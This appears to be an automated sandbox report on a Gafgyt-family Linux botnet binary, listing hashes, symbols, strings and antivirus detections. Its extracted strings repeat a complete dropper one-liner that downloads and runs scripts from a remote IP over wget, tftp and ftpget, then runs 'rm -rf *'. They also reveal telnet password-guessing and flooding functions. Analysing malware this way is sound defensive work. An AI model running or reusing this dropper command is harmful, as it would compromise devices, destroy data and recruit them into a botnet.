Report #1706 cancel

Binary
ABI
ELFOSABI_SYSV
Size
72.75KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
89872aeff8396a2e86aab447c86f5394
sha1
22e7f59b7f8792f12bfc0b6ef75ca319bf432082
crc32
0x35371506
sha224
4705c8f769943bebf84e9b39228e5a2382801b7b7965da7bcd17ab63
sha256
27f248d86f9942081878a3c87d2b8888c0ec6811ca4b89a58b6a5f2d844e8853
sha384
4d633e63874caeb05e9883b907aa59042fbfa40046bbd35945525618a55c50f1f0ad53c4b104b3e07ef066bf338695cf
sha512
ffae7c8b8fb51701ff592b2084a268552f0a7f80933f73e7c4722d5cd4d29e639884c7650c7711726509cca4e0f76c79d211bf057aa894564e405704b287654d
ssdeep
1536:8j4gwI6yastO49zyje4MkJLwDnOD8J52rf3BstzWT/O/sYw2g59RLZ5:8jN6R+x9zyje4MkJLwDnOD8mrfRSzO/p
Community
Google
False cancel
HashLib
False cancel
YARA
Matches
maldoc_getEIP_method_1, domain, url, IP, contentis_base64, is__elf

Suspicious
True check_circle

Dwarf
List

Number
0
Files
Sys

Home

Proc
/proc/cpuinfo, /proc/net/route
Password

Suspicious
True check_circle
Flags
Flags
0
Packer
List
None
Packed
False cancel
Network
IPs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://162.243.216.150/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 162.243.216.150 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 162.243.216.150; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 162.243.216.150 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit, 162.243.216.150:23
URLs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://162.243.216.150/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 162.243.216.150 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 162.243.216.150; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 162.243.216.150 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit
Mails

Suspicious
True check_circle
Strings
List
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://162.243.216.150/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 162.243.216.150 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 162.243.216.150; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 162.243.216.150 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit
162.243.216.150:23
.got.plt
Network is down
Machine is not on the network
No route to host
Host is down
been_there_done_that.2832
been_there_done_that
_fwrite.c
open.c
write.c
Transport endpoint is not connected
No such process
Block device required
No such device or address
Remote address changed
Operation now in progress
Too many open files
Too many open files in system
Connection reset by peer
No such device
Is a named type file
Link has been severed
Object is remote
Too many links
REPORT %s:%s:%s
.lib section in a.out corrupted
Cannot send after transport endpoint shutdown
Operation not permitted
My IP: %s
Invalid flag "%s"
8.8.8.8
BUILD %s
BUILD %s
Too many users
__GI_execl
__GI_fflush_unlocked
PONG!
__libc_nanosleep
__GI_sleep
__socketcall
__GI_execve
__register_frame_info_bases
__GI_pipe
_Jv_RegisterClasses
__deregister_frame_info_bases
fflush_unlocked.c
__GI_nanosleep
nanosleep.c
__socketcall.c
fflush_unlocked
socket.c
__GI_socket
sleep.c
sendHTTP
tcpcsum
PONG
HTTP
commServer
pipe.c
Software caused connection abort
Socket operation on non-socket
inet_addr
currentServer
Identifier removed
Interrupted system call should be restarted
Operation already in progress
Address family not supported by protocol
Too many references: cannot splice
makeIPPacket
usernames
Transport endpoint is already connected
KILLATTK
random_poly_info
random_r
random.c
changeme
Permission denied
nanosleep
srandom_r
__GI_random_r
password
sendTCP
Too many levels of symbolic links
Can not access a needed shared library
fwrite_unlocked
Not a XENIX named type file
processCmd
random_r.c
Exec format error
__GI_srandom_r
Protocol driver not attached
passwords
Attempting to link in too many shared libraries
getHost
Network dropped connection on reset
__GI_random
vfprintf
Name not unique on network

Symbols
List
libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtors_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysdeps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, client.c, c, Q, i.4252, printchar, prints, printi, print, fdopen_pids, hextable, ipState, libc/sysdeps/linux/i386/vfork.S, __syscall_fcntl.c, __syscall_fcntl64.c, _exit.c, chdir.c, close.c, dup2.c, fork.c, getdtablesize.c, getpid.c, getrlimit.c, ioctl.c, kill.c, open.c, pipe.c, prctl.c, read.c, select.c, setsid.c, sigprocmask.c, time.c, waitpid.c, write.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, __errno_location.c, printf.c, popen.c, mylock, popen_list, _stdio.c, _stdio_streams, __stdio_mutex_initializer.3991, _fixed_buffers, _wcommit.c, vfprintf.c, _vfprintf_internal.c, _charpad, _fp_out_narrow, spec_base.4201, prefix.4202, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type_codes, type_sizes, spec_flags.4203, qual_chars.4208, spec_chars.4204, spec_ranges.4205, spec_or_mask.4206, spec_and_mask.4207, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strcat.c, strchr.c, strcpy.c, strlen.c, strncpy.c, strnlen.c, strstr.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unknown.1161, _string_syserrmsgs.c, strtok.c, next_start.1109, isatty.c, tcgetattr.c, ntohl.c, inet_ntoa.c, buf.2658, inet_makeaddr.c, connect.c, getsockname.c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, socket.c, sigaddset.c, sigempty.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, mylock, unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, execl.c, sleep.c, sysconf.c, __uClibc_main.c, __pthread_return_0, __pthread_return_void, __check_one_fd, been_there_done_that.2832, sigaction.c, __restore_rt, __restore, __syscall_error.c, libc/sysdeps/linux/i386/mmap.S, __socketcall.c, __syscall_rt_sigaction.c, clock_getres.c, execve.c, getegid.c, geteuid.c, getgid.c, getpagesize.c, getuid.c, munmap.c, nanosleep.c, sbrk.c, wait4.c, errno.c, wcrtomb.c, wcsrtombs.c, wcsnrtombs.c, fclose.c, fdopen.c, _WRITE.c, _fopen.c, _fwrite.c, _trans2w.c, _load_inttype.c, _store_inttype.c, _uintmaxtostr.c, _fpmaxtostr.c, fmt, exp10_table, fflush_unlocked.c, memchr.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, inet_aton.c, raise.c, dl-support.c, brk.c, fseeko.c, fseeko64.c, _adjust_pos.c, _cs_funcs.c, rawmemchr.c, strspn.c, llseek.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __GI_execve, __libc_sigaction, strcpy, __GI_fcntl64, recvLine, __GI_sigaddset, __socketcall, __GI___ctype_b, __GI_memchr, __GI___glibc_strerror_r, waitpid, getrlimit, ioctl, _stdio_openlist_use_count, __GI_initstate_r, __GI_sigaction, strtok_r, __GI___C_ctype_toupper_data, __GI_time, getgid, popen, sysconf, printf, stdout, random, __GI_getpagesize, getdtablesize, __GI_h_errno, __GI___ctype_toupper, recv, connect, __GI___uClibc_fini, numpids, sigemptyset, __pthread_mutex_lock, initConnection, __sigdelset, __GI_clock_getres, __uClibc_fini, memrchr, geteuid, __GI_setsid, sendTCP, pclose, __bsd_signal, __GI_strpbrk, munmap, __GI_setsockopt, __libc_stack_end, __GI_fclose, __GI_wcsnrtombs, __GI_pipe, _uintmaxtostr, __libc_fcntl, atol, _h_errno, getRandomPublicIP, __ctype_b, __GI_random_r, usernames, errno, getegid, __GI_sbrk, zprintf, __GI___uClibc_init, execve, getpagesize, getpid, __GI_lseek64, setstate_r, getHost, __libc_getpid, wildString, __xpg_strerror_r, fcntl64, prctl, memcpy, makeRandomStr, getRandomIP, __GI_fputs_unlocked, execl, sendHTTP, creat, _stdio_openlist_dec_use, sclose, __libc_select, _ppfs_init, __GI___C_ctype_toupper, __libc_nanosleep, trim, dup2, __pthread_mutex_init, getuid, system, malloc, isatty, sleep, __GI_atol, __GI_read, random_r, __dso_handle, clock_getres, tcpcsum, fdpclose, socket, __GI_dup2, select, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fcntl, __GI_memset, isspace, __stdio_seek, mempcpy, __GI_write, __ctype_toupper, __libc_read, _string_syserrmsgs, __GI_open, __GI_strchr, sigaddset, __GI_tcgetattr, __environ, mmap, wcsnrtombs, makeIPPacket, sockprintf, __GI_inet_ntoa, send, abort, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, __GI_getgid, srandom_r, _init, __GI_inet_ntoa_r, __GI_setstate_r, parseHex, strtol, pipe, __libc_lseek64, strnlen, rawmemchr, __GI_mempcpy, __malloc_state, __GI___C_ctype_b_data, __sigaddset, nanosleep, __GI_send, h_errno, __pthread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_fini, csum, __exit_cleanup, __GI_execl, __GI_srandom_r, write, environ, __GI_close, getBuild, kill, fputs_unlocked, __pthread_mutex_trylock, strcat, __GI_brk, __GI_strcat, __GI_nanosleep, __GI_strtok, _stdio_openlist, __GI_sigprocmask, inet_addr, ntohl, __GI_fseek, ourIP, chdir, fseeko, _stdio_openlist_del_count, connectTimeout, __raise, setsockopt, bsd_signal, fseek, __GI_kill, setstate, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, __stdin, stdin, __GI_isatty, _start, __deregister_frame_info_bases, strstr, __GI_ioctl, init_rand, rand, signal, read, getCores, __GI_memcpy, wcsrtombs, _stdio_user_locking, strncpy, htonl, sendto, __C_ctype_toupper, StartTheLelz, __GI___C_ctype_b, __GI_strncpy, __libc_send, __GI___xpg_strerror_r, currentServer, __GI_getrlimit, __GI_strcpy, strtok, __stdio_adjust_position, malloc_trim, fdopen, _vfprintf_internal, fork, gotIP, __GI_sleep, sigaction, _dl_phdr, __GI___libc_fcntl64, __uClibc_init, __GI_munmap, _store_inttype, __getpagesize, __GI_random, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, __libc_close, __GI_getpid, inet_aton, index, _pthread_cleanup_push_defer, processCmd, __sigismember, __bss_start, __libc_open, getOurIP, memset, __GI_socket, main, __glibc_strerror_r, listFork, __stdio_fwrite, negotiate, srand, initstate, fclose, __syscall_rt_sigaction, ntohs, sendUDP, inet_ntoa, tcgetattr, time, __libc_system, __GI_abort, fdpopen, __stdio_init_mutex, __GI__exit, data_start, __GI_sysconf, __h_errno_location, matchPrompt, __C_ctype_b_data, _stdio_fopen, _fini, __GI_chdir, __vfork, __GI_mmap, fdgets, __get_pc_thunk_bx, strerror_r, __GI_select, __libc_waitpid, __GI_waitpid, _stdio_term, __GI_vfprintf, __GI_signal, stderr, commServer, vfork, __C_ctype_b, srandom, _ppfs_setargs, __GI_sendto, __GI_sigemptyset, __GI_printf, __libc_fork, __atexit_lock, scanPid, rand_cmwc, __libc_fcntl64, getsockopt, __GI_fseeko64, fflush_unlocked, __stdio_wcommit, fwrite_unlocked, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_strstr, _end, htons, _sigintr, _ppfs_prepargs, __GI_strspn, initstate_r, __GI_connect, __curbrk, _dl_phnum, _fpmaxtostr, __errno_location, uppercase, _stdlib_strto_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, __GI_geteuid, brk, __C_ctype_toupper_data, _dl_aux_init, sendJUNK, _errno, atoi, _stdio_openlist_del_lock, __GI_inet_aton, _exit, szprintf, strspn, __libc_recv, __libc_creat, strlen, lseek64, open, toupper, __libc_write, __malloc_consolidate, _ppfs_parsespec, __GI_strtol, __GI_getuid, __GI_strtok_r, __GI_errno, __libc_sendto, __stdio_trans2w_o, __GI_vfork, strchr, __GI_rawmemchr, __GI_raise, __data_start, setsid, __GI_inet_addr, __GI_strnlen, _Jv_RegisterClasses, infectline, macAddress, __GI___errno_location, readUntil, fcntl, __GI_fdopen, __GI_atoi, fseeko64, wcrtomb, __GI_getsockname, close, __libc_connect, passwords, __GI_strlen, sendHOLD, mainCommSock, pids, sendCNC, vfprintf, strpbrk, getBogos, _load_inttype, raise, free, sigprocmask, getsockname
Number
624
Reason
None
Suspicious
False cancel
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False cancel
Sections
List
, .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .comment, .shstrtab, .symtab, .strtab
Number
16
Suspicious
False cancel
Segments
Number
3
Suspicious
False cancel
Compilers
List
GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2
Identified
133
Suspicious
True check_circle
Functions
List
, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , libc/sysdeps/linux/i386/crti.S, , crtstuff.c, , __CTOR_LIST__, , __DTOR_LIST__, , __EH_FRAME_BEGIN__, , __JCR_LIST__, , completed.2429, , p.2427, , __do_global_dtors_aux, , object.2482, , frame_dummy, , crtstuff.c, , __CTOR_END__, , __DTOR_END__, , __FRAME_END__, , __JCR_END__, , __do_global_ctors_aux, , initfini.c, , libc/sysdeps/linux/i386/crtn.S, , libc/sysdeps/linux/i386/crt1.S, , client.c, , c, , Q, , i.4252, , printchar, , prints, , printi, , print, , fdopen_pids, , hextable, , ipState, , libc/sysdeps/linux/i386/vfork.S, , __syscall_fcntl.c, , __syscall_fcntl64.c, , _exit.c, , chdir.c, , close.c, , dup2.c, , fork.c, , getdtablesize.c, , getpid.c, , getrlimit.c, , ioctl.c, , kill.c, , open.c, , pipe.c, , prctl.c, , read.c, , select.c, , setsid.c, , sigprocmask.c, , time.c, , waitpid.c, , write.c, , isspace.c, , toupper.c, , __C_ctype_b.c, , __C_ctype_toupper.c, , __errno_location.c, , printf.c, , popen.c, , mylock, , popen_list, , _stdio.c, , _stdio_streams, , __stdio_mutex_initializer.3991, , _fixed_buffers, , _wcommit.c, , vfprintf.c, , _vfprintf_internal.c, , _charpad, , _fp_out_narrow, , spec_base.4201, , prefix.4202, , _ppfs_init.c, , _ppfs_prepargs.c, , _ppfs_setargs.c, , _ppfs_parsespec.c, , _promoted_size, , type_codes, , type_sizes, , spec_flags.4203, , qual_chars.4208, , spec_chars.4204, , spec_ranges.4205, , spec_or_mask.4206, , spec_and_mask.4207, , fputs_unlocked.c, , fwrite_unlocked.c, , memcpy.c, , memset.c, , strcat.c, , strchr.c, , strcpy.c, , strlen.c, , strncpy.c, , strnlen.c, , strstr.c, , __glibc_strerror_r.c, , __xpg_strerror_r.c, , unknown.1161, , _string_syserrmsgs.c, , strtok.c, , next_start.1109, , isatty.c, , tcgetattr.c, , ntohl.c, , inet_ntoa.c, , buf.2658, , inet_makeaddr.c, , connect.c, , getsockname.c, , getsockopt.c, , recv.c, , send.c, , sendto.c, , setsockopt.c, , socket.c, , sigaddset.c, , sigempty.c, , signal.c, , sigsetops.c, , malloc.c, , __malloc_largebin_index, , free.c, , __malloc_trim, , abort.c, , mylock, , been_there_done_that, , rand.c, , random.c, , mylock, , unsafe_state, , randtbl, , random_r.c, , random_poly_info, , system.c, , atol.c, , strtol.c, , _stdlib_strto_l.c, , exit.c, , execl.c, , sleep.c, , sysconf.c, , __uClibc_main.c, , __pthread_return_0, , __pthread_return_void, , __check_one_fd, , been_there_done_that.2832, , sigaction.c, , __restore_rt, , __restore, , __syscall_error.c, , libc/sysdeps/linux/i386/mmap.S, , __socketcall.c, , __syscall_rt_sigaction.c, , clock_getres.c, , execve.c, , getegid.c, , geteuid.c, , getgid.c, , getpagesize.c, , getuid.c, , munmap.c, , nanosleep.c, , sbrk.c, , wait4.c, , errno.c, , wcrtomb.c, , wcsrtombs.c, , wcsnrtombs.c, , fclose.c, , fdopen.c, , _WRITE.c, , _fopen.c, , _fwrite.c, , _trans2w.c, , _load_inttype.c, , _store_inttype.c, , _uintmaxtostr.c, , _fpmaxtostr.c, , fmt, , exp10_table, , fflush_unlocked.c, , memchr.c, , mempcpy.c, , memrchr.c, , strtok_r.c, , strpbrk.c, , inet_aton.c, , raise.c, , dl-support.c, , brk.c, , fseeko.c, , fseeko64.c, , _adjust_pos.c, , _cs_funcs.c, , rawmemchr.c, , strspn.c, , llseek.c, , __fini_array_end, , __fini_array_start, , __init_array_end, , __preinit_array_end, , _GLOBAL_OFFSET_TABLE_, , __init_array_start, , __preinit_array_start, , __GI_execve, , __libc_sigaction, , strcpy, , __GI_fcntl64, , recvLine, , __GI_sigaddset, , __socketcall, , __GI___ctype_b, , __GI_memchr, , __GI___glibc_strerror_r, , waitpid, , getrlimit, , ioctl, , _stdio_openlist_use_count, , __GI_initstate_r, , __GI_sigaction, , strtok_r, , __GI___C_ctype_toupper_data, , __GI_time, , getgid, , popen, , sysconf, , printf, , stdout, , random, , __GI_getpagesize, , getdtablesize, , __GI_h_errno, , __GI___ctype_toupper, , recv, , connect, , __GI___uClibc_fini, , numpids, , sigemptyset, , __pthread_mutex_lock, , initConnection, , __sigdelset, , __GI_clock_getres, , __uClibc_fini, , memrchr, , geteuid, , __GI_setsid, , sendTCP, , pclose, , __bsd_signal, , __GI_strpbrk, , munmap, , __GI_setsockopt, , __libc_stack_end, , __GI_fclose, , __GI_wcsnrtombs, , __GI_pipe, , _uintmaxtostr, , __libc_fcntl, , atol, , _h_errno, , getRandomPublicIP, , __ctype_b, , __GI_random_r, , usernames, , errno, , getegid, , __GI_sbrk, , zprintf, , __GI___uClibc_init, , execve, , getpagesize, , getpid, , __GI_lseek64, , setstate_r, , getHost, , __libc_getpid, , wildString, , __xpg_strerror_r, , fcntl64, , prctl, , memcpy, , makeRandomStr, , getRandomIP, , __GI_fputs_unlocked, , execl, , sendHTTP, , creat, , _stdio_openlist_dec_use, , sclose, , __libc_select, , _ppfs_init, , __GI___C_ctype_toupper, , __libc_nanosleep, , trim, , dup2, , __pthread_mutex_init, , getuid, , system, , malloc, , isatty, , sleep, , __GI_atol, , __GI_read, , random_r, , __dso_handle, , clock_getres, , tcpcsum, , fdpclose, , socket, , __GI_dup2, , select, , _pthread_cleanup_pop_restore, , __GI_wcrtomb, , __GI___libc_fcntl, , __GI_memset, , isspace, , __stdio_seek, , mempcpy, , __GI_write, , __ctype_toupper, , __libc_read, , _string_syserrmsgs, , __GI_open, , __GI_strchr, , sigaddset, , __GI_tcgetattr, , __environ, , mmap, , wcsnrtombs, , makeIPPacket, , sockprintf, , __GI_inet_ntoa, , send, , abort, , __GI_fcntl, , __GI_wcsrtombs, , __GI_fwrite_unlocked, , __GI_getgid, , srandom_r, , _init, , __GI_inet_ntoa_r, , __GI_setstate_r, , parseHex, , strtol, , pipe, , __libc_lseek64, , strnlen, , rawmemchr, , __GI_mempcpy, , __malloc_state, , __GI___C_ctype_b_data, , __sigaddset, , nanosleep, , __GI_send, , h_errno, , __pthread_mutex_unlock, , wait4, , __register_frame_info_bases, , __GI_exit, , __app_fini, , csum, , __exit_cleanup, , __GI_execl, , __GI_srandom_r, , write, , environ, , __GI_close, , getBuild, , kill, , fputs_unlocked, , __pthread_mutex_trylock, , strcat, , __GI_brk, , __GI_strcat, , __GI_nanosleep, , __GI_strtok, , _stdio_openlist, , __GI_sigprocmask, , inet_addr, , ntohl, , __GI_fseek, , ourIP, , chdir, , fseeko, , _stdio_openlist_del_count, , connectTimeout, , __raise, , setsockopt, , bsd_signal, , fseek, , __GI_kill, , setstate, , memchr, , __GI_toupper, , __pthread_initialize_minimal, , __GI_recv, , __stdin, , stdin, , __GI_isatty, , _start, , __deregister_frame_info_bases, , strstr, , __GI_ioctl, , init_rand, , rand, , signal, , read, , getCores, , __GI_memcpy, , wcsrtombs, , _stdio_user_locking, , strncpy, , htonl, , sendto, , __C_ctype_toupper, , StartTheLelz, , __GI___C_ctype_b, , __GI_strncpy, , __libc_send, , __GI___xpg_strerror_r, , currentServer, , __GI_getrlimit, , __GI_strcpy, , strtok, , __stdio_adjust_position, , malloc_trim, , fdopen, , _vfprintf_internal, , fork, , gotIP, , __GI_sleep, , sigaction, , _dl_phdr, , __GI___libc_fcntl64, , __uClibc_init, , __GI_munmap, , _store_inttype, , __getpagesize, , __GI_random, , __syscall_error, , __uclibc_progname, , __GI_getegid, , __GI_wait4, , __malloc_lock, , __uClibc_main, , sbrk, , __rtld_fini, , __GI_fork, , __libc_close, , __GI_getpid, , inet_aton, , index, , _pthread_cleanup_push_defer, , processCmd, , __sigismember, , __bss_start, , __libc_open, , getOurIP, , memset, , __GI_socket, , main, , __glibc_strerror_r, , listFork, , __stdio_fwrite, , negotiate, , srand, , initstate, , fclose, , __syscall_rt_sigaction, , ntohs, , sendUDP, , inet_ntoa, , tcgetattr, , time, , __libc_system, , __GI_abort, , fdpopen, , __stdio_init_mutex, , __GI__exit, , data_start, , __GI_sysconf, , __h_errno_location, , matchPrompt, , __C_ctype_b_data, , _stdio_fopen, , _fini, , __GI_chdir, , __vfork, , __GI_mmap, , fdgets, , __get_pc_thunk_bx, , strerror_r, , __GI_select, , __libc_waitpid, , __GI_waitpid, , _stdio_term, , __GI_vfprintf, , __GI_signal, , stderr, , commServer, , vfork, , __C_ctype_b, , srandom, , _ppfs_setargs, , __GI_sendto, , __GI_sigemptyset, , __GI_printf, , __libc_fork, , __atexit_lock, , scanPid, , rand_cmwc, , __libc_fcntl64, , getsockopt, , __GI_fseeko64, , fflush_unlocked, , __stdio_wcommit, , fwrite_unlocked, , inet_ntoa_r, , __pagesize, , _stdio_openlist_add_lock, , __GI_getdtablesize, , _edata, , __stdout, , __GI_memrchr, , __GI_fflush_unlocked, , __GI_strstr, , _end, , htons, , _sigintr, , _ppfs_prepargs, , __GI_strspn, , initstate_r, , __GI_connect, , __curbrk, , _dl_phnum, , _fpmaxtostr, , __errno_location, , uppercase, , _stdlib_strto_l, , __GI___libc_open, , exit, , __stdio_WRITE, , _stdio_init, , __GI_geteuid, , brk, , __C_ctype_toupper_data, , _dl_aux_init, , sendJUNK, , _errno, , atoi, , _stdio_openlist_del_lock, , __GI_inet_aton, , _exit, , szprintf, , strspn, , __libc_recv, , __libc_creat, , strlen, , lseek64, , open, , toupper, , __libc_write, , __malloc_consolidate, , _ppfs_parsespec, , __GI_strtol, , __GI_getuid, , __GI_strtok_r, , __GI_errno, , __libc_sendto, , __stdio_trans2w_o, , __GI_vfork, , strchr, , __GI_rawmemchr, , __GI_raise, , __data_start, , setsid, , __GI_inet_addr, , __GI_strnlen, , _Jv_RegisterClasses, , infectline, , macAddress, , __GI___errno_location, , readUntil, , fcntl, , __GI_fdopen, , __GI_atoi, , fseeko64, , wcrtomb, , __GI_getsockname, , close, , __libc_connect, , passwords, , __GI_strlen, , sendHOLD, , mainCommSock, , pids, , sendCNC, , vfprintf, , strpbrk, , getBogos, , _load_inttype, , raise, , free, , sigprocmask, , getsockname,
Present
True check_circle
Anti-Debug
Ptrace
False cancel
Anti-disasm
False cancel
Entry Point
Address
0x8048164
Suspicious
False cancel
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
3
Offset
52
Section Header
Size
40
Number
16
Offset
56552
AVclass
gafgyt
1
VirusTotal
md5
89872aeff8396a2e86aab447c86f5394
sha1
22e7f59b7f8792f12bfc0b6ef75ca319bf432082
SCANS (DETECTION RATE = 64.81%)
AVG
result: ELF:DDoS-Y [Trj]
update: 20190308
version: 18.4.3895.0
detected: True check_circle

CMC
update: 20190307
version: 1.1.0.977
detected: False cancel

MAX
result: malware (ai score=98)
update: 20190308
version: 2018.9.12.1
detected: True check_circle

Bkav
update: 20190307
version: 1.3.0.9899
detected: False cancel

K7GW
update: 20190308
version: 11.32.30218
detected: False cancel

ALYac
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190308
version: 1.1.1.5
detected: True check_circle

Avast
result: ELF:DDoS-Y [Trj]
update: 20190308
version: 18.4.3895.0
detected: True check_circle

Avira
result: DDOS/LNX.Lightaidra.rddnf
update: 20190307
version: 8.3.3.8
detected: True check_circle

Baidu
update: 20190306
version: 1.0.0.2
detected: False cancel

Cyren
update: 20190308
version: 6.2.0.1
detected: False cancel

DrWeb
result: Linux.BackDoor.Fgt.373
update: 20190308
version: 7.0.34.11020
detected: True check_circle

GData
result: Linux.Trojan.Gafgyt.B
update: 20190308
version: A:25.20990B:25.14553
detected: True check_circle

Panda
update: 20190307
version: 4.6.4.2
detected: False cancel

VBA32
update: 20190307
version: 4.0.0
detected: False cancel

Zoner
update: 20190308
version: 1.0
detected: False cancel

ClamAV
